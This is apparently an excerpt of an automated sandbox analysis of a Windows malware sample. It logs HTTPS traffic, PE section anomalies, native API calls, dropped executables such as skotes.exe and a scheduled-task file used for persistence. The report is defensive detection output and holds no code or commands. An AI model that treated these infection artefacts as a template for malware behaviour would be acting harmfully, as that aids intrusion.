Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54668
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54667
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54545
Source: unknown	Network traffic detected: HTTP traffic on port 54579 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54666
Source: unknown	Network traffic detected: HTTP traffic on port 54739 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54672
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54550
Source: unknown	Network traffic detected: HTTP traffic on port 54660 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54670
Source: unknown	Network traffic detected: HTTP traffic on port 49823 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49674 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 54511 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 54534 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 54647 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 54672 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54676
Source: unknown	Network traffic detected: HTTP traffic on port 49834 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54675
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54674
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54673
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54559
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54558
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54679
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54678
Source: unknown	Network traffic detected: HTTP traffic on port 54704 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54677
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54562
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54683
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54561
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54682
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54560
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54681
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54680
Source: unknown	Network traffic detected: HTTP traffic on port 49847 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 54717 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49709 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 54694 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 54774 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49822 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 54613 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54687
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54686
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54564
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54685
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54563
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54684
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54569
Source: unknown	Network traffic detected: HTTP traffic on port 49765 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54568
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54689
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54567
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54688
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54690
Source: unknown	Network traffic detected: HTTP traffic on port 54683 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54694
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54572
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54693
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54571
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54692
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54691
Source: unknown	Network traffic detected: HTTP traffic on port 49811 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 54567 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 54624 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54618
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54739
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54617
Source: unknown	Network traffic detected: HTTP traffic on port 54693 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54738
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54616
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54737
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54615
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54736
Source: unknown	Network traffic detected: HTTP traffic on port 49813 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 54670 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 54532 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54610
Source: unknown	Network traffic detected: HTTP traffic on port 54649 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54731
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54730
Source: unknown	Network traffic detected: HTTP traffic on port 49836 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54614
Source: unknown	Network traffic detected: HTTP traffic on port 54729 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54735
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54613
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54734
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54612
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54733
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54611
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54732
Source: unknown	Network traffic detected: HTTP traffic on port 54658 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49776 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49845 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 54730 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49753 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54508
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54629
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54507
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54628
Source: unknown	Network traffic detected: HTTP traffic on port 54703 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54749
Source: unknown	Network traffic detected: HTTP traffic on port 54776 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54506
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54748
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54505
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54626
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54747
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54621
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54742
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54741
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54740
Source: unknown	Network traffic detected: HTTP traffic on port 54615 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54504
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54625
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54746
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54503
Source: unknown	Network traffic detected: HTTP traffic on port 54593 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54624
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54745
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54623
Source: unknown	Network traffic detected: HTTP traffic on port 54741 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54744
Source: unknown	Network traffic detected: HTTP traffic on port 49780 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54622
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54743
Source: unknown	Network traffic detected: HTTP traffic on port 49802 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 54681 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 54626 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 54718 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54519
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54518
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54639
Source: unknown	Network traffic detected: HTTP traffic on port 54775 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54517
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54759
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54516
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54637
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54758
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54511
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54632
Source: unknown	Network traffic detected: HTTP traffic on port 54637 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54753
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54510
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54631
Source: unknown	Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54630
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54751
Source: unknown	Network traffic detected: HTTP traffic on port 54614 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54750
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54515
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54636
Source: unknown	Network traffic detected: HTTP traffic on port 54742 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54757
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54514
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54635
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54756
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54513
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54634
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54755
Source: unknown	Network traffic detected: HTTP traffic on port 49764 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54512
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54633
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54754
Source: unknown	Network traffic detected: HTTP traffic on port 49801 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54760
Source: unknown	Network traffic detected: HTTP traffic on port 49824 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 54682 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 54510 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54649
Source: unknown	Network traffic detected: HTTP traffic on port 54753 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54527
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54648
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54769

Source: unknown	HTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.5:49726 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.5:49731 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.5:49736 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.126.31.69:443 -> 192.168.2.5:49776 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.126.31.69:443 -> 192.168.2.5:49806 version: TLS 1.2

System Summary

PE file contains section with special chars

Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: .rsrc
Source: file.exe	Static PE information: section name: .idata
Source: file.exe	Static PE information: section name:
Source: DocumentsHCFBFBAEBK.exe.0.dr	Static PE information: section name:
Source: DocumentsHCFBFBAEBK.exe.0.dr	Static PE information: section name: .idata
Source: random[1].exe.0.dr	Static PE information: section name:
Source: random[1].exe.0.dr	Static PE information: section name: .rsrc
Source: random[1].exe.0.dr	Static PE information: section name: .idata
Source: random[1].exe.0.dr	Static PE information: section name:
Source: skotes.exe.21.dr	Static PE information: section name:
Source: skotes.exe.21.dr	Static PE information: section name: .idata

Contains functionality to call native functions

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6AB700 NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,	0_2_6C6AB700
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6AB8C0 rand_s,NtQueryVirtualMemory,	0_2_6C6AB8C0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6AB910 rand_s,NtQueryVirtualMemory,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,GetLastError,	0_2_6C6AB910
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C64F280 NtQueryVirtualMemory,GetProcAddress,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,	0_2_6C64F280
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 23_2_0017CB97 NtFlushProcessWriteBuffers,NtFlushProcessWriteBuffers,	23_2_0017CB97

Creates files inside the system directory

Source: C:\Users\user\DocumentsHCFBFBAEBK.exe

File created: C:\Windows\Tasks\skotes.job

Detected potential crypto function

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6435A0	0_2_6C6435A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C655440	0_2_6C655440
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6B545C	0_2_6C6B545C
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6B542B	0_2_6C6B542B
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6BAC00	0_2_6C6BAC00
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C685C10	0_2_6C685C10
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C692C10	0_2_6C692C10
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C64D4E0	0_2_6C64D4E0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C686CF0	0_2_6C686CF0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6564C0	0_2_6C6564C0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C66D4D0	0_2_6C66D4D0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6A34A0	0_2_6C6A34A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6AC4A0	0_2_6C6AC4A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C656C80	0_2_6C656C80
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C65FD00	0_2_6C65FD00
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C670512	0_2_6C670512
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C66ED10	0_2_6C66ED10
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6A85F0	0_2_6C6A85F0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C680DD0	0_2_6C680DD0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6B6E63	0_2_6C6B6E63
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C64C670	0_2_6C64C670
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C664640	0_2_6C664640
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C692E4E	0_2_6C692E4E
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C669E50	0_2_6C669E50
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C683E50	0_2_6C683E50
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6A9E30	0_2_6C6A9E30
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C695600	0_2_6C695600
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C687E10	0_2_6C687E10
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6B76E3	0_2_6C6B76E3
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C64BEF0	0_2_6C64BEF0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C65FEF0	0_2_6C65FEF0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6A4EA0	0_2_6C6A4EA0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6AE680	0_2_6C6AE680
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C665E90	0_2_6C665E90
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C659F00	0_2_6C659F00
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C687710	0_2_6C687710
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C64DFE0	0_2_6C64DFE0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C676FF0	0_2_6C676FF0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6977A0	0_2_6C6977A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C68F070	0_2_6C68F070
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C668850	0_2_6C668850
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C66D850	0_2_6C66D850
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C68B820	0_2_6C68B820
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C694820	0_2_6C694820
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C657810	0_2_6C657810
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C66C0E0	0_2_6C66C0E0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6858E0	0_2_6C6858E0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6B50C7	0_2_6C6B50C7
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6760A0	0_2_6C6760A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C65D960	0_2_6C65D960
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C69B970	0_2_6C69B970
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6BB170	0_2_6C6BB170
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C66A940	0_2_6C66A940
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C64C9A0	0_2_6C64C9A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C67D9B0	0_2_6C67D9B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C685190	0_2_6C685190
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6A2990	0_2_6C6A2990
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C689A60	0_2_6C689A60
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C661AF0	0_2_6C661AF0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C68E2F0	0_2_6C68E2F0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C688AC0	0_2_6C688AC0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6422A0	0_2_6C6422A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C674AA0	0_2_6C674AA0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C65CAB0	0_2_6C65CAB0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6B2AB0	0_2_6C6B2AB0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6BBA90	0_2_6C6BBA90
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C65C370	0_2_6C65C370
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C645340	0_2_6C645340
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C68D320	0_2_6C68D320
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6B53C8	0_2_6C6B53C8
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C64F380	0_2_6C64F380
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6FAC60	0_2_6C6FAC60
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7CAC30	0_2_6C7CAC30
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7B6C00	0_2_6C7B6C00
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C74ECD0	0_2_6C74ECD0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6EECC0	0_2_6C6EECC0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7BED70	0_2_6C7BED70
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C87CDC0	0_2_6C87CDC0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C878D20	0_2_6C878D20
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C81AD50	0_2_6C81AD50
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6F4DB0	0_2_6C6F4DB0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C786D90	0_2_6C786D90
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C78EE70	0_2_6C78EE70
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7D0E20	0_2_6C7D0E20
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6FAEC0	0_2_6C6FAEC0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C790EC0	0_2_6C790EC0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C776E90	0_2_6C776E90
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7B2F70	0_2_6C7B2F70
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C838FB0	0_2_6C838FB0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C75EF40	0_2_6C75EF40
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6F6F10	0_2_6C6F6F10
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7CEFF0	0_2_6C7CEFF0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6F0FE0	0_2_6C6F0FE0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C830F20	0_2_6C830F20
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6FEFB0	0_2_6C6FEFB0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7C4840	0_2_6C7C4840
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C740820	0_2_6C740820
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C77A820	0_2_6C77A820
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7F68E0	0_2_6C7F68E0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C728960	0_2_6C728960
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C80C9E0	0_2_6C80C9E0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C746900	0_2_6C746900
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7249F0	0_2_6C7249F0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7B09B0	0_2_6C7B09B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7809A0	0_2_6C7809A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7AA9A0	0_2_6C7AA9A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C76CA70	0_2_6C76CA70
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7A8A30	0_2_6C7A8A30
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C79EA00	0_2_6C79EA00
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C76EA80	0_2_6C76EA80
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7F6BE0	0_2_6C7F6BE0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6F8BAC	0_2_6C6F8BAC
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C790BA0	0_2_6C790BA0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C81A480	0_2_6C81A480
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C708460	0_2_6C708460
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C77A430	0_2_6C77A430
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C754420	0_2_6C754420
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7364D0	0_2_6C7364D0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C78A4D0	0_2_6C78A4D0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C790570	0_2_6C790570
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C752560	0_2_6C752560
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C748540	0_2_6C748540
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7F4540	0_2_6C7F4540
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C77E5F0	0_2_6C77E5F0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7BA5E0	0_2_6C7BA5E0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C838550	0_2_6C838550
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6E45B0	0_2_6C6E45B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C74C650	0_2_6C74C650
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C74E6E0	0_2_6C74E6E0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C78E6E0	0_2_6C78E6E0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7146D0	0_2_6C7146D0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C770700	0_2_6C770700
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C71A7D0	0_2_6C71A7D0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C73E070	0_2_6C73E070
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7B8010	0_2_6C7B8010
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7BC000	0_2_6C7BC000
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7000B0	0_2_6C7000B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7CC0B0	0_2_6C7CC0B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6E8090	0_2_6C6E8090
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C758140	0_2_6C758140
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C766130	0_2_6C766130
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7D4130	0_2_6C7D4130
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6F01E0	0_2_6C6F01E0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C778260	0_2_6C778260
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C788250	0_2_6C788250
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C8762C0	0_2_6C8762C0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7C8220	0_2_6C7C8220
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7BA210	0_2_6C7BA210
Source: C:\Users\user\DocumentsHCFBFBAEBK.exe	Code function: 21_2_008878BB	21_2_008878BB
Source: C:\Users\user\DocumentsHCFBFBAEBK.exe	Code function: 21_2_00887049	21_2_00887049
Source: C:\Users\user\DocumentsHCFBFBAEBK.exe	Code function: 21_2_00888860	21_2_00888860
Source: C:\Users\user\DocumentsHCFBFBAEBK.exe	Code function: 21_2_008831A8	21_2_008831A8
Source: C:\Users\user\DocumentsHCFBFBAEBK.exe	Code function: 21_2_00844B30	21_2_00844B30
Source: C:\Users\user\DocumentsHCFBFBAEBK.exe	Code function: 21_2_00844DE0	21_2_00844DE0
Source: C:\Users\user\DocumentsHCFBFBAEBK.exe	Code function: 21_2_00882D10	21_2_00882D10
Source: C:\Users\user\DocumentsHCFBFBAEBK.exe	Code function: 21_2_0088779B	21_2_0088779B
Source: C:\Users\user\DocumentsHCFBFBAEBK.exe	Code function: 21_2_00877F36	21_2_00877F36
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 22_2_001A7049	22_2_001A7049
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 22_2_001A8860	22_2_001A8860
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 22_2_001A78BB	22_2_001A78BB
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 22_2_001A31A8	22_2_001A31A8
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 22_2_00164B30	22_2_00164B30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 22_2_001A2D10	22_2_001A2D10
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 22_2_00164DE0	22_2_00164DE0
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 22_2_00197F36	22_2_00197F36
